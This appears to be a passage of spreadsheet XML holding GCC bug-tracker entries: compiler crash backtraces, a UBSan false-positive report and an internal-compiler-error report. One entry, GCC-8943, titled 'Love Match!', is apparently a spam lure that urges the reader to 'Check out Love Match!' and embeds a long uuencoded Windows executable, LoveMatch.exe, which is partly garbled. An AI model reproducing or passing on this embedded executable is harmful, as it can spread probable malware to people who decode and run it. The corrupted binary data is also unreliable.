0x886444 vec::operator[](unsigned int)
        ../../gcc/vec.h:714
0x886444 vec::operator[](unsigned int)
        ../../gcc/vec.h:1180
0x886444 possible_polymorphic_call_targets(tree_node* long ipa_polymorphic_call_context bool* void** bool)
        ../../gcc/ipa-devirt.c:3181
0x888a7a possible_polymorphic_call_targets(cgraph_edge* bool* void** bool)
        ../../gcc/ipa-utils.h:114
0x888a7a ipa_devirt
        ../../gcc/ipa-devirt.c:3576
Worked a few days ago with the trunk in the preliminary patch PR69630 comment 3 applied. (As that PR is fixed my current trunk build has no extra patches applied.)</t>
  </si>
  <si>
    <t>GCC-80386</t>
  </si>
  <si>
    <t>UBSAN: false positive - constant folding and reassosiation before instrumentation</t>
  </si>
  <si>
    <t>gcc ubsan incorrectly does code instrumentation triggering false positive alarm.
This looks like expression reassosiation and constant folding were done before UBSAN instrumentation turning legal code to illegal. 
&gt; cat f.cpp
static unsigned long long int member_1_3 = 13996271126042720493ULL
int main() {
  // 2921 - 14573 + MAX_INT
  (((2921 + 0) - short(member_1_3)) + 0x7fffffff) &gt;&gt; 0
  return 0
}
&gt; g++ -fsanitize=undefined -O0 -o out f.cpp
&gt; ./out
f.cpp:5:37: runtime error: signed integer overflow: -2147480728 - 14573 cannot be represented in type 'int'
I'm using top of the trunk gcc.</t>
  </si>
  <si>
    <t>GCC-57036</t>
  </si>
  <si>
    <t>[4.9 Regression] ice in update_ssa_across_abnormal_edges</t>
  </si>
  <si>
    <t>Created attachment 29916
C source code
I just tried to compile the package hplip-3.13.4-1
on gcc-4.9 trunk dated 20130421 on an AMD x86_64 box.
The compiler said
ip/xjpg_dec.c:2612:32: internal compiler error: in update_ssa_across_abnormal_edges at tree-inline.c:1852
                         memset (g-&gt;out_rows_ap[comp][row] ycc_white[comp] row_len)
                                ^
0x94304d update_ssa_across_abnormal_edges
    ../../src/trunk/gcc/tree-inline.c:1852
0x94304d copy_edges_for_bb
    ../../src/trunk/gcc/tree-inline.c:1958
0x94304d copy_cfg_body
    ../../src/trunk/gcc/tree-inline.c:2276
0x94304d copy_body
    ../../src/trunk/gcc/tree-inline.c:2460
0x946ef3 expand_call_inline
    ../../src/trunk/gcc/tree-inline.c:4060
0x946ef3 gimple_expand_calls_inline
    ../../src/trunk/gcc/tree-inline.c:4167
0x946ef3 optimize_inline_calls(tree_node*)
    ../../src/trunk/gcc/tree-inline.c:4321
0xd37356 early_inliner
    ../../src/trunk/gcc/ipa-inline.c:2038
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-8943</t>
  </si>
  <si>
    <t>Love Match!</t>
  </si>
  <si>
    <t xml:space="preserve"> Check out Love Match!
 begin 755 LoveMatch.exe
 M35J0``````$````__\``+@`````````0```````````````````````````
 M````````````````````T`````X?N@X`M`G-(@!3TA5&amp;AI&lt;R!P&lt;F]G&lt;F%M
 M(FYO=!B92!R=6X@:6X@1$]3(&amp;UO9&amp;4N#0T*)`````````#?7S\NFSY1
 M?9L^47V/E%]FSY0?5D^47WY(4)]E#Y1?9L^47V:/E%]&lt;R%?9X^47US(5I]
 MUCY1?2X5WV:/E%]4FEC:)L^47T``````````%!%``!`04`O9B&lt;.0``````
 M````X``/`0L!!@``4`0``(`!``````PTP```!````!@!````$```!`````0
 M```$``````````0``````````.`%```0`````````@``````$```$``````0
 M```0````````$```````````````P$`*``````0`4`T)8`````````````
 M````````````````````````````````````````````````````````````
 M``````````````````````````!@!``@`P``````````````````````````
 M````````+G1E&gt;'0````L2P0``!````!0!```$```````````````````(```
 M8YR9&amp;%T80``6'P```!@!```@````&amp;`$`````````````````$```$`N9&amp;%T
 M80```'Q&amp;````X`0``#````#@!`````````````````!```#`+F1A=&amp;$Q``P
 M`````#`%```0````$`4`````````````````0```PYR&lt;W)C````T)8```!`
 M!0``H`````%`````````````````$```$``````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M````````````````````````````````````````````````````````````
 M`#/`B0&amp;)00B)002)00S#D)!6B_$SP(U.#(E&amp;!(D&amp;B48(Z-O___^+QE[#D)0
 MD)0D%-6B_&amp;+3@B%R70Z55&gt;+?04C5X5XD[Z0M`@-+#B+%C/)@\`BFT!
 M`\&gt;*30)1A+1@1?A!%YP@0`D)0D)0@^P(4XM&lt;
 M)!!65XOQ_^#^P*)=00=0Z+3@B!PP``(M.%.!P&lt;````#H?``
 M`(7`=`M?7C/`6X/$($`(M.%.!P&lt;````#HG@``(L.A&lt;F)30#X2B````
 M5&gt;L$BTPD$(59'1[BWD$\^`@```(IG`8H'B^B%[71AC00^]LSTH/&amp;!(IX
 M`XI0`8I8`L'C`O:]**$(M$)!S!XP@+VH7H=!Z+304C10^BT$(4%*+2%B!
 MP3P%``#H#+P!`(M)!`#\S/2BG0^`8T$/H/&amp;`HH0B^J%[76CBUPD'+\!````
 MBT$A&lt;)100#X5M____B\==7UY@\0(P@0`B\=?7EN#Q`C!`0D)!358LI
 M\!65X7M='7V10@%=%J+?00SP+D````BF%P'1'C30Y](SVX/!!(IV
 M`XI&gt;`8I6`L'B`O3]N*'L'B`O3J`5TXMT)!2-!#D[QG0G`\HSTHIT.0&amp;*
 M%#F-!#F+PH/!`H7`=F+0R%[7697UY=\!P@0`N`$```!?7EUP@0`D)0
 MD)0D)!3BUPD%97B[/`!@``_^%]G0858ML)!A5C4Y@Z#_^__^+=B`+^(7V
 M=&gt;Y=BT0D&amp;(7`=#&amp;%_W0M:@+R^A`MP(`:@&amp;+R^@GX`(`BX/D@``A&lt;!T$8O+
 MZ'[``#'@^0*````````B\=?7EO#D)0D)0BT0D!(/X$'\J=)(@_@'=U/_
 M)(7X$D``\##N`$```##N`(```##N````##N`0```##@\#@/&gt;````!W)S/)
 MBH@L$T``_R2-&amp;!-``+@%````P[@&amp;````P[@'````P[@(````PX/(_\.H$D``
 MJQ)``/020`Q$D``]!)``/020`#T$D``MQ)``-P20`#B$D``Z!)``.X20`#T
 M$D````0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0!!`0$!`0$!`0$
 M!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$
 M!`0$!`0$!`0$`@0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$
 M!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$
 M!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$!`0$
 M!`0#D)05HOQZ`@```+QE[#D)0D%&gt;+^D)````\#SJU_#D)+10$5HOQ
 M4.A3_O__@\0$A&lt;!\&amp;8LA2!C1`!7BSR&amp;]([SU\/GL*+PE[!`X`0```%[
 M!`0D)0D)0D)0BT0D!%:+\5#H$_[__X/$!(7`?`/_!(9&gt;P@0`D)0D)#
 M[R+10RBU0D5-55HMT)$17BWPD07_````@&gt;+_````B40D)('G_P```'H
 M!(E)!)50PB7PD-(OHP&gt;H$P&gt;\$*^ZY``````^8P4D#QKL/````(^D[PXE&lt;
 M)!1_!(E$)!2+PKD`````*\:)71`#YC!22/(C00R.\.)308?P2)11`B\&gt;Y
 M`````O&amp;B5PD2`^8P4DCR(T$-SO#B4PD.'\$B40D2(M$)!2+]3OHB70D(`^/
 M!P$``(/^#W4'N/\```#K!8O&amp;P&gt;`$BUPD&amp;(M4)$+^XE&lt;)!P[^@^/SP```M$
 M)2+T'F!(E4)R)=0HZPB+=0HBU0D+(/[#W4'N/\```#K!8O#P&gt;`$A=)]
 M`O?:*T0D'D]]B-+!+11(_.+^&lt;'F!#O(?VZ#_P]U![C_````ZP6+Q\'@
 M!(M)#2+U@O7*\%Y`O?8`\4]_@```'X%N/X```+300BEP1!(O+@&gt;'_````
 M.\%]'(M)!`^_]U!O^)!!```(A$$02+`8I)$2(#!+11(1SOX?IJ+70&lt;
 MBTPD.(M$)$!#.]B)70&lt;#XY(____BW0D((M$)!1&amp;._)=0@#X[Y_O__7UY=
 M6X/$+(`)0D)0D%-H!```.@UF@``B]B#Q`2%VW1WBT0D#%6+05E&gt;)
 M`XU[!+D`!```@\C_QT0D&amp;````#SJ\&gt;#!!`````0``+@P00``%P'XUBT4`
 M_:%P'X&gt;C7T$BTPD&amp;(L74592B\OHROW__XM%`$:#QP0[\'SEBT0D&amp;$#^!)
 M108?%3ZN9``#Q`1?7EUPY0D(M4)`1355:+E&gt;+?08.S=T!U]&gt;73/`
 M6\.+QDZ%P(U*!'0UB\&amp;+ZBO*^^-1#@!BE$BE@!.M-UV8H4*(H8.M-UT(H1
 MBEC_.M-UQX/!!(/`!(O63H72===?7EVX`0```%O#D)0D)0D)0D)0D)+
 M30$BU0D%:#P@2+`8E_(U!!(L)B_%)A?9T#BO008LPB30@\`$277U7L.0
 MD)![`0$``!6:!`4``#H_Y@``(OP@\0$A?9U%Z!Q`0$``##5XN\)!`$``-
 M1@C'!@````!05\=&amp;!`$```#HC____XV.#`0``%%7Z(+^__^-5084E?HMP$`
 M`(/$&amp;(U$)`A0_Q708$0`B88%```B\9?7H'$!`0``.0D)0D)0D%:+-2`(
 M10!7BWPD#(7V=!&gt;-1@A05^C&amp;_O__@\0(A&lt;!U%HLVA?9UZ5?H4____X/$!(7`
 M=0]?7L.+1@1?0(E&amp;!(O&amp;7L.+#2`(10!?B0BC(`A%`%[#D)0D)0D)0D)0
 MD%:+=0(A?9T8(M&amp;!$B)1@1U5XL-(`A%`+@@$4`A&lt;ET+CDP=`J+#HO&amp;A&lt;EU
 M]%[#BPZ)(N&amp;#!0``(7`=-0_Q4L8$0`5NCVEP``@\0$7L.+A@P4``%P'0'
 M4/\5+HVI&lt;``(/$!%[#D)0D)!6:!`4``#HM9&lt;``(OP@\0$A?9U`E[#
 M4XM&lt;)`Q7C7X(5U/'!@````#'1@0!````ZT```-A@P$``!05^A`_?__@\00
 M4_\5T&amp;!$`(F&amp;#!0``%^+QEM&gt;PY0D)0D)0D)!5BVPD#%:+=0\!79HM&amp;
 M`C/2B44`_]F.58C4T$=C+P5KQ2ONC40P`HI8_D&gt;('B*6/^(60&amp;*&amp;(@9
 M]N(40-FBUX@\$$@\`$._M\W%M?7EW#D)0D)0D)0D)+50$5HMT)`Q7
 M9HL_]FA&lt;!FB489L&lt;&amp;``.-3@1V-XO!4U4KQHONC400`2OJN@0```*6`%'
 MB!F*B%$#9HM&gt;`@/*`\([^WS&gt;75M?7L.0D)0D)+10$
 M4U565S/_C5`%_:+ZH'D````#/)B\6#Q1B*F5!C1`(6`&amp;*GE!C1`(&amp;(J?
 M4PY0
 MD)+P3/)B0B)2)2`R)2!R)22)2B)2R)2#)2#2)2#C#D)0D)0D)0
 MD)0D)#I&amp;P```)0D)0D)0D)0BU$\%T@^5P.0D)0D%:+\5&gt;+1B!0
 MZ+/]__^+1B@S_X/$!#O'B7X@=`\Y?CAU!U#_%2Q@1`)?BB+1C`[QW01.7XX
 M=0E0Z..C``#Q`2)?C)?@R)?CA?7L.0D)0BU0D(O!BTPD!(D(C4K_@_D?
 MQT`$`````=`#``````/AY\````STHJ1_!M``/\DE&gt;`0`#'0!0`````QT`&lt;
 M\'\``=`&amp;`$```#`#'0!0!````QT`&lt;\'\``=`&amp;`$```#`#'0!0````
 MQT`&lt;\'\``=`&amp;`$```#`#'0!0$````QT`&lt;\'\``=`&amp;`$```#`#'0!0&amp;
 M````QT`&lt;\'\``=`&amp;`$```#`#'0!0'````QT`&lt;\'\``=`&amp;`$```#`#'
 M0!0#````QT`&lt;\'\``=`0`!]&amp;T``E1M`
 M`*T0`#%&amp;T````$&amp;`@8&amp;!@8&amp;!@8&amp;!@8&amp;`P8&amp;!@8&amp;!@8$!@8&amp;!@8&amp;!@60D)0
 M5HOQBT8$A&lt;!T%XM&amp;(L.4%'_%3!@1`+5@12_Q4L8$0`BT8A&lt;!T$5#_%61A
 M1`+1@Q0_Q6840`7L.0D)0D('L0`0``(N4)$0$``!350^^JD1C1`!6B_$S
 MVU&lt;Y7@1U:%/_%&lt;!B1`+^&amp;C(````:@```!7_Q5`8$0`5U.)1@3_%&lt;1B1`+
 M1@2+#E!1_Q4P8$0`:`!Q`@!J0(E&amp;/\5`&amp;%$`%)1@S_%6AA1``[PXE&amp;$'0.
 MN7\X`0!FB0B#P`))=?&gt;+E14!```N0H!```SP(U\)CSJXN$)%@$``#'10H
 M*````/?8&amp;\#'10LR````60`0``9HEL)#8%./___X/Z`XE$)#X`0```&amp;:)
 M10TB5PD.(E&lt;)#R)71`B5PD1'\\B\W3X#O#B40D2(E$)$R-4/]T5HU)%*+
 MPL9!`0`D`?8&amp;L#P00D`?[(B$'ZB$'[B$'\B\)*ALM@_H%B5PD2(E&lt;
 M)$QU(=$)#@#````QT0D4`#X``#'114X`+
 M+9AA1`-30@4?_5A&lt;!T:XM&amp;$(U4)A34HL.4&amp;C(````4U-3:@```!HR```
 M`%-34?\5.&amp;!$`(7`=#/_UXU4)!A2_]6+?08BT0D(OX&gt;0+WWSM^''T7BXPD
 M5`0``(N4)%@$``)3A2)5AB)?AQ?7EU@&lt;1`!```P@@`C40D$&amp;H(4/\5\&amp;)$
 M`(M)!!1_Q7L8D0`BSWH8D0`_]&gt;+Z(M&amp;$&amp;@@`P`C50D+%-2BPY0:@```!H
 MR````%-3:@```!HR````%-34?\5-&amp;!$`(O8_Q4\8$0`_]&gt;+500B_@K_8LM
 MY#X]B____BT0D$%#_U5]&gt;75N!Q$`$``#`0D)0D)0@^PD
 M4U565XOQZ.+[__\SVU/_%51@1`++4Q@1`!J#E)108_]6+^(M$)!!J#%#_
 MU0^O^*$`X$0`O0$````[QP^$_````#O#?@7HD?```(M)!!748U)!R)/0#@
 M1`#HW/O__X/_$'5756H$C4PD'.@K_?__56H$C4PD'.@?_?__4VH$C4PD'.@3
 M_?__56H%C4PD'.@'_?__4VH%C4PD'.C[_/__@7PD`!P``!^#%5J!HU)!SH
 MY?S__U-J!&gt;M=@_\8574T:@:-30&lt;Z_\__]5:@:-30&lt;Z/\__]3:@:-30&lt;
 MZ+?\__]5:@&gt;-30&lt;Z*O\__]3:@?K(XM4)R-3084NB8_/__BT0D*%50C4PD
 M'.B)_/__BTPD*%-1C4PD'.AZ_/__BU0D*(M$)R-304B14D$4`HP3@1`#H
 M'OS__XL-)`A%`(E.!(L5!.!$`(D6#[Z!1&amp;-$`(E&amp;(M$)#B+4`B+.O7B584
 MBU`BW@$BT84#Z]&amp;(/`'RO7P?@#)/R#^0.)5AB)1A)7AP/C^```#HI^\`
 M`#O#B48@=0Q?7ETSP%N#Q3!`+&gt;`1'B7@$BTX@BU$(C025*````%)1C3H
 M-YX``(E&amp;&lt;`*````(M&amp;(M.%(/$!(E(!(L&amp;.\.+1AAU`O?8BU8PB4((BT8P
 M9HEH#(M.&amp;:+5@AFB5$.BT8PB5@0BTX8#Z].$(M6(E*%(M&amp;(E8&amp;(M.(E9
 M'(M6((M&amp;(M*(E(((M6((M&amp;(M*(E()(M6((M&amp;(U*#(M2(/`*(OZ2H7_
 M#X3````C7H!BE$@\$$B%`BE']B%`!BE'\B!(6`.#P`1/=&gt;/IG0```&amp;HT
 MQT8T-````.A[G0``B48PQP`H````BT8PBTX4@\0$B4@$BP8[PXM&amp;&amp;'4]]B+
 M5C)0@B+1C!FB6@BTXP9HM6&amp;:)40Z+1C)6!+3A@/KTX0BU8PB4H4BT8P
 MB5@8BTXPB5D&lt;BU8PB5H@BT8PB5@DBT8$@_@%=22+3C#'01`#````BT8P@\`H
 MQP``^```QT`$X`&lt;``=`!\```+1C+?004XU6#%-24U!7_Q5(8$0`5XE&amp;
 M*/\51@\0DP@0`D)0D)0D)![`0$``!35597
 MB[PD&amp;`0``(OQ]NY`@```(U'_XE^(/X'W&lt;[]**D&amp;@D0`#_))5)$``B5X$
 MZR&gt;)3@3K(L=&amp;!````#K&amp;&lt;=&amp;!`0```#K$=&amp;!`8```#K!\=&amp;!`&lt;```+A0&lt;
 M!```O0$````[PP^%C0```#O]=2.Z_P```(A&lt;)!2(705B%PD%HA4)!B(509
 MB%0D&amp;HE)!#K0X/_!'4Q\Z_P```(/X#W4$B\KK!8O(P&gt;$$B$R$%(AA!6(
 M3(060(/X#W[CQT0D$!````#K#8U$)!!0Z!7W__^#Q`2-3004&gt;@8]?__@\0$
 M.\.)1B!U&amp;5]&gt;73/`6X'$!`0``(4`(E&amp;((M(!$&amp;)2`2+5B+0@B-!(4H````
 M4(E&amp;-.B/FP``B48PQP`H````BTXP@\0$B6D$BU8PB6H(BT8P9HEH#(M.#/M
 M9HEY#HM6(E:$(M&amp;(E8%(M.(E9&amp;(M6(E:'(M&amp;((M.(M0(E1((M&amp;((M.
 M(M0(E1)(M&amp;(M6((/`*#E:(U*#'XBBE$18A0`HI1`8A0`8H1B!(6`.+
 M5B#P`2#P00[:@A\WHN4)`$``+C0H!```#Z_ZBX0D)`0``(/''\'_`X/G
 M_#O+B0Z)5A2)1AB)?A)7AQU`O?8BTXP4XE!(M6(M&amp;%(E!(M.&amp;`^O3A+
 M5C)2A3_%51@1`+3C+^%.-1@Q34%-15_\52&amp;!$`%&gt;)1BC_%41@1`+3B@S
 MP%\[RUY=#Y7`6X'$!`0``(4`(U)`$0B0`!)(D``3B)``%&lt;B0`!@(D``:2)`
 M`'`B0```!@8!!@8&amp;`@8&amp;!@8&amp;!@8#!@8&amp;!@8&amp;!@0&amp;!@8&amp;!@8&amp;!90D)0D)0
 MBT0D#&lt;%*`A%``````+B+@```#P0.)B+@````SP-5B^Q14U97QT7\````
 M`%%3G%B+R#4```0`4)V&lt;6#/!=#N&lt;6(O(-0``(`!0G9Q8\%T*K@`````#Z*#
 M^`!T'H'[0WER:74)?`/```](`4``'0*N`$````/HHE5_%EBT7\)0````*)
 M1?QT2=%_)`D0`#'!2@(10`!````_W7\9/\U`````)88L$
 M)B^5=PU]&gt;\!B^5=PY0D)!5
 MB^R#[R+#0C@1`#R/^)1?R)1?A3C4745E?'1?0`````B47LB4WP45.&lt;6(O(
 M-0``!`!0G9Q8\''1&gt;0#````='''1&gt;0$````G%B+R#4````4)V&lt;6#/!=%FX
 M``````^BB5W4B578B4W&lt;BW7LBWWPN0P```#SIG4'QT7T`0```+@!````#Z*)
 M1&gt;@E``\``'H(A%Y(M%Z(A%_(-E_`^+1&gt;B(1?B!9?CP````P6WX!(E5X%E
 MBT4(A&lt;!T!8M5Y(D0BT4A&lt;!T!8M-_(D(BT40A&lt;!T!8M5^(D0BT44A&lt;!T!8M-
 MX(D(BTWT\#^0%?7EL/E+Y5W#D)0D)0D)0BTPD!(M$)!+$8D0BTD$
 MB4@$BTPD(L1B5`(BTD$B4@BTPD#(L1B5`0BTD$B4@4QT`8`````.0D)0
 MD)0D(M)`2+105E&gt;+$8D0BU$$B5`$BU0D$(LQBSH#]U_1_HEP(M)!(MR
 M!`/.7M'YB4@BPJ)2!+4@2)4!3'0!@!````PY0D)0D)0D)0BTPD!(M$
 M)`A6BQ&amp;+&lt;1`[UGT'B1+41#K!(DPBQ&amp;)4`2+402+&lt;10[UGT(B5`(BU$4ZP:)
 M&lt;`B+402)4`R+41B%TG4LBU$(BS`[UGT$B1#K#M0!'X#B5`$BTDBU`(.\I]
 M!8E(%[#.T@?@.)2`Q&gt;PXM4)`2+0AB%P'0#\##BTH0BP(#R(M-'Y5HMR
 M!O(BT(4`\:+&lt;@S1^O&amp;7H7)?0+WV87`?0+WV#O(B]%\`HO0T?HKP@/!PY0
 MD)0D)0@^P(BT0D#%-55HM0#(MP!(L(BU@(BV@`]:+&lt;!`#RP/S5XMX%-'Y
 MT?X#_8LHC1P.T?K1_]'[B5PD$(T&lt;%]'[B5PD%(M&lt;))*XMH!(E+(M)2)
 M4PR+500B6L$BVPD%(D1B6D$B50B6L4B7$(B7DBU`07XE1$(M0%(E1%(M`
 M&amp;(E!&amp;%Z)0QA=6X/$.0@^P8C40D`%-5BVPD*%:+=0H5U!5C5X(5E/H7`
 M`(U)B-?A!155-7Z%S``-51`C40D%)5C4PD0%!1Z`QS``+11DBQ:+
 M714@\0PB1+3@2+500B4@$BTPD%(E0(M4))2`R+30XB1&amp;)602)4!+
 M508B5@4B5$(BU0D'(E1#(L7B5$0BU&lt;$B5$4BW88B7$8B7`87UY=6X/$&amp;.0
 MD)0D)0D)0D)+10$BTPD#O!=1F+(M0!%:+&lt;!)(MP%(EP!(E($(E0
 M%%[#BU`0B1&amp;+4!2)402+4`B)40B+4`R)40R+$(E1$(M0!(E1%(M`&amp;(E!&amp;.0
 MD(/L2(U$)`!3BUPD4%974%/HF_W__XM\)&amp;2+308@\0(.P\/C*H```+1P2+
 M304.\@/CYL````Y108#XZ1````C50D#%=2Z*1X``#Q`B%P'17BW0D8&amp;:#
 M_@QS38U$)`Q0Z%EY``#Q`2#^`1^.XU)#B-50&lt;45)3Z/']__]&amp;C40D*%97
 M4.AT____5HU)%1746:+V.AE____@\0D`]AFB\-?7EN#Q$C#BT$BTL4.\%T
 M'GX@\1(PU]&gt;9C/`6X/$2.0D)0
 M58OLBTT(4U:+=0R+`8D&amp;BU$$B58$BT$(*P&amp;)10BXJJH``(M=/?K#ZS0$(/0
 M`(E%#(L1BUT`].)5@B+00PK002)10BXJJH``(M=/?K#ZS0$(/0`(E%#(M1
 M!(M=#`/3B58BT$(*T$0B44(N*JJ``+70CWZP^LT!#T`)10R+41+70P#
 MTXE6$(M!#M!%(E%+BJJ@``BUT(]^L/K-`0@]``B44BU$4BT4`])5A2+
 M01)1AB+212)3AQ&gt;6UW#D)0D)0D)0D)0D(/L%-6BW0D%%&gt;+1AB%P'0)
 M7UXSP%N#Q`C#BT80BPZ+5@2-?A`#P8M/!-'X`\J)10C50D#(U&amp;-'Y4E)
 M308Z+IQ``+V(/$(/[!G\)7UXSP%N#Q`C#5UHH'$``(T&amp;X/$#/2.\@/
 MG\)?7HO6X/$.0D)0D)0D)0@^P84U56BW0D*%&gt;-?A!75N@K&lt;0``BVPD
 M/(/$(7`?AQ0BT0D-%50Z!1Q``#Q`A0Z!MO``#Q`B+V.L%NP```0+3@B+
 M%HM&amp;!O*BU8B4PD$(L/*]+1@B)504*\&amp;+3@R)108BT&lt;$C50D&amp;O(4HE
 M)#H!W```(OPC40D%%#H^V\``(/$#OP``BT0D
 M/(M4)!R#Q`R+`/*BU`$B4PD((M)!0#T8E4)3K8U$)!B-3084%-1Z`)O
 M``+50+=0DBT4$BTPD*(/$#`/6`\&amp;)50@B40D)(M$)#+30XC50D(%%5
 M4E#H\/G__X/$$%]&gt;75N#Q!C#D)0D)!15FH`_Q548$0`B_%]G4#7EG#BTPD
 M#(U$)`10:-`L0`!15L=$)!0`````_Q56&lt;.0BT0D
 M$&lt;``0```#/`PA``D*$L$4`5H7`5P^%@P```(L]#&amp;%$`%-H`8```&lt;%+`A%
 M``$```#_UVBDX40`B]C_%0AA1`!3B_#_UX7V6W14BST$840`:)3A1`!6_]&gt;%
 MP*P$4`=#UH@.%$`%_UX7`HS0(10!T+:%#A
 M1`!6_]&gt;%P*\$4`=`K'!2P(10`````7U[#D)0D)0D)0D)A+`A%`(/L
 M'(7`=07H3____Z$L$4`5H/X`E=U88M\)A7_Q4P$4`B_%]G10BTPD+(/Y
 M_W0BT0D(/X_W02B4PD#(E$)!#'10(`@```.L(QT0D`````-10(4%_
 M%3@(10+10TA&lt;!T%!6_Q4\$4`5E?_%30(10!?7H/$'.0D)0D)0D)0
 MD)!7_]7_Q6T8D0`A&lt;!T%-J`?\5N&amp;)$`(O8A=MT4E93_Q5H840`B_#R?^+
 M_C/`\J[WT5'H6((``(OX@\0$A?]T)HH&amp;B\^$P(O6=!F*`CP-=`L\G4$B`'K
 M`H@!08I`4*$P'7GQ@$`4_\59QB1`+QUM?PXO'7\.0D%56BW0D
 M#%&gt;+_H/)_S/`\J[WT4E0B^E%_Q6T8D0`A&lt;!T15-5:`(@``#_%0!A1`+V%/_
 M%6AA1`+S8OXB\%3P&gt;D\Z6+R(/A`_.D_Q5D840`_Q6@8D0`4VH!_Q6D8D0`
 M_Q6\8D0`6U]&gt;7&lt;.0D)0D)!6_96_Q6T8D0`A&lt;!T%VH!_Q6X8D0`A&lt;!T!X!
 M````_Q6\8D0`B\9&gt;PY0D)0D)+30$\!F.0%TH/!`D!F@SD`=?#D)0
 MD)0D)0D%.+70058U$&amp;P)0Z$!``+Z(/$!(7M=0-=6\.+300BU0D#%97
 MA=N+_8TTG0ZB@90Z.F5`@#Q`2%P'0@_L!?A8SR8/'`HHNBDX!@\89HE/
 M_H/K`NL9@^V%F:)%X/'`D9+A=MUQF'!P``7XO%7EUPY0D)0D)0D)0
 MBT0D#%:+=0(5X7`#X23````Z#F5`@%P`^$A@```(M\)!!F@?Z``''9H'_
 M@`!R=%9H*.!$`.B$````@\0(A&lt;!T!5\SP%[#5VA`X$0`Z&amp;T```#Q`B%P'0%
 M7S/`7L-F@_\PPV:#_C!R
 M+F:#_CEW*%=HD.!$`.@G````@\0(A&lt;!T%E\SP%[#9H/^('0+9H/^+70%7S/`
 M7L-?N`$```!&gt;PY048M$)`A3]LRTHH(BEPD$83)B%PD!W1*@/D!=0:*4`%`
 MZQZ`^0)U)HI(`4!`.MIU$(I*2`%`AEUSS/`6UG#
 M.MIU[SA)!!T`NOGN`$```!6&lt;SP%M9PY0D)0D)0D(M$)`2)`3/`B4$$
 MB4$&lt;B4$@B4$(P@0`D)0D)0D)0QT$(`````.0D)0D)0D%-7BWPD#(O1
 MA?]\8HM'#OX?5N+700A=M^4XT'SO(?@2+VO?58MJ!%:--!\KQHT0(T$
 M=M'AC71%`(T$?XU\10+PA&lt;!==`8I
 MF'P#``+RNB____7UO`0D)0D)0D)0D)045-55E&gt;+?0@B]F%_P^.
 M:0$``(ML)!B%[7T$^WK8M#'#OH?@*+Z(M#'#OH=!&gt;+4P2-3&amp;T`9HL2F:#
 M^0IT!F:#^0UU$`/'QT0D)`````)108ZQ^+30DA&lt;EU`/'B40D&amp;.L/C0PO
 MB40D&amp;#O!?P2)308BT0D&amp;(M+(#O!?EV#P$-!$#1X%#H8GX``(/$!(E$)!%
 MP`^$WP```(MS!(7V=R+2QR+^(T2='AB]'!Z0+SI8O*@^$#\Z2+0P10Z#M^
 M``+104BWPD)(/$!(M)!B)0P2-04)0R+10DA&lt;!U18M#'$@[Q7P]C10X
 MC0Q`*\6-%%+1X='B0(E$)2+&lt;P2-!#$#\H/I!H/J!HLXB3YFBT`$9HE&amp;!(M$
 M)1(B40D)'7BWPD((M#!(MT)!R-#'^-5&amp;T`T&gt;&amp;-/%+T&lt;'I`O.EB\J#X0/S
 MI(L#A&lt;!T'8M+'(N0?```O1B9!\`P``BP.+508`9!\`P``BT0D&amp;(O+B4&lt;
 MZ/3]__]?7EU6&lt;(0`)0D)0D)0D)0D(L!A&lt;!T$XM1'%:+L'P#```K\HFP
 M?```%Z+202%R70'4&gt;A*?0``6+1B%P'4[BT8H:FB+
